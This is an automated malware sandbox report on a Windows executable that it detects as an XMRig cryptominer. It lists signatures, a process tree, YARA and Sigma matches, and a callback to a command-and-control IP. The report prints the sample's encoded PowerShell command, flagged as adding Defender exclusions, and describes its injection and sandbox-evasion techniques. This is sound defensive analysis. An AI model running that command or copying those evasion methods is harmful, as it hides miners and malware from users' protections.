Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1574100
MD5:	60bc4894d78ba3f2ef9aa66486aad79e
SHA1:	255ea77a0b211d3a1296e908e2c5d3d10b048d1b
SHA256:	fbddc581f4b7288285aa44ae2f772b5606d7a0104b1e88169f9499229b7028c0
Tags:	exeuser-Bitsight
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Xmrig cryptocurrency miner

.NET source code contains potential unpacker

AI detected suspicious sample

Encrypted powershell cmdline option found

Found direct / indirect Syscall (likely to bypass EDR)

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Execution of Powershell with Base64

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 984 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 60BC4894D78BA3F2EF9AA66486AAD79E)

powershell.exe (PID: 5644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7056 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 3652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1920,i,4819257383897995677,4500115031677660423,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cvtres.exe (PID: 7216 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe" MD5: C877CBB966EA5939AA2A17B6A5160950)

explorer.exe (PID: 7236 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cvtres.exe (PID: 1120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe" MD5: C877CBB966EA5939AA2A17B6A5160950)

WindosCPUsystem.exe (PID: 7280 cmdline: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe MD5: 60BC4894D78BA3F2EF9AA66486AAD79E)

powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7432 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2912880514.000001FBA74F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x36fe08:$a1: mining.set_target 0x362030:$a2: XMRIG_HOSTNAME 0x3649a8:$a3: Usage: xmrig [OPTIONS] 0x362008:$a4: XMRIG_VERSION
00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu 0x3b9400:$s3: \\.\WinRing0_ 0x366fa8:$s4: pool_wallet 0x3613d8:$s5: cryptonight 0x3613e8:$s5: cryptonight 0x3613f8:$s5: cryptonight 0x361408:$s5: cryptonight 0x361420:$s5: cryptonight 0x361430:$s5: cryptonight 0x361440:$s5: cryptonight 0x361458:$s5: cryptonight 0x361468:$s5: cryptonight 0x361480:$s5: cryptonight 0x361498:$s5: cryptonight 0x3614a8:$s5: cryptonight 0x3614b8:$s5: cryptonight 0x3614c8:$s5: cryptonight 0x3614e0:$s5: cryptonight 0x3614f8:$s5: cryptonight 0x361508:$s5: cryptonight 0x361518:$s5: cryptonight
00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: file.exe PID: 984	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: cvtres.exe PID: 7216	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: cvtres.exe PID: 7216	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x14266:$a1: mining.set_target 0x1098e:$a2: XMRIG_HOSTNAME 0x11780:$a3: Usage: xmrig [OPTIONS] 0x1096f:$a4: XMRIG_VERSION
Process Memory Space: explorer.exe PID: 7236	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: WindosCPUsystem.exe PID: 7280	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.1fba74f0000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.3.cvtres.exe.171d47d0000.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
7.3.cvtres.exe.171d47d0000.1.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x36f008:$a1: mining.set_target 0x361230:$a2: XMRIG_HOSTNAME 0x363ba8:$a3: Usage: xmrig [OPTIONS] 0x361208:$a4: XMRIG_VERSION
7.3.cvtres.exe.171d47d0000.1.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3b4761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
7.3.cvtres.exe.171d47d0000.1.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3b4fd8:$s1: %s/%s (Windows NT %lu.%lu 0x3b8600:$s3: \\.\WinRing0_ 0x3661a8:$s4: pool_wallet 0x3605d8:$s5: cryptonight 0x3605e8:$s5: cryptonight 0x3605f8:$s5: cryptonight 0x360608:$s5: cryptonight 0x360620:$s5: cryptonight 0x360630:$s5: cryptonight 0x360640:$s5: cryptonight 0x360658:$s5: cryptonight 0x360668:$s5: cryptonight 0x360680:$s5: cryptonight 0x360698:$s5: cryptonight 0x3606a8:$s5: cryptonight 0x3606b8:$s5: cryptonight 0x3606c8:$s5: cryptonight 0x3606e0:$s5: cryptonight 0x3606f8:$s5: cryptonight 0x360708:$s5: cryptonight 0x360718:$s5: cryptonight
7.3.cvtres.exe.171d47d0000.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
7.3.cvtres.exe.171d47d0000.1.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x36fe08:$a1: mining.set_target 0x362030:$a2: XMRIG_HOSTNAME 0x3649a8:$a3: Usage: xmrig [OPTIONS] 0x362008:$a4: XMRIG_VERSION
7.3.cvtres.exe.171d47d0000.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
7.3.cvtres.exe.171d47d0000.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu 0x3b9400:$s3: \\.\WinRing0_ 0x366fa8:$s4: pool_wallet 0x3613d8:$s5: cryptonight 0x3613e8:$s5: cryptonight 0x3613f8:$s5: cryptonight 0x361408:$s5: cryptonight 0x361420:$s5: cryptonight 0x361430:$s5: cryptonight 0x361440:$s5: cryptonight 0x361458:$s5: cryptonight 0x361468:$s5: cryptonight 0x361480:$s5: cryptonight 0x361498:$s5: cryptonight 0x3614a8:$s5: cryptonight 0x3614b8:$s5: cryptonight 0x3614c8:$s5: cryptonight 0x3614e0:$s5: cryptonight 0x3614f8:$s5: cryptonight 0x361508:$s5: cryptonight 0x361518:$s5: cryptonight
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 185.157.162.216, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\explorer.exe, Initiated: true, ProcessId: 7236, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49718

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 984, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 984, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 984, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 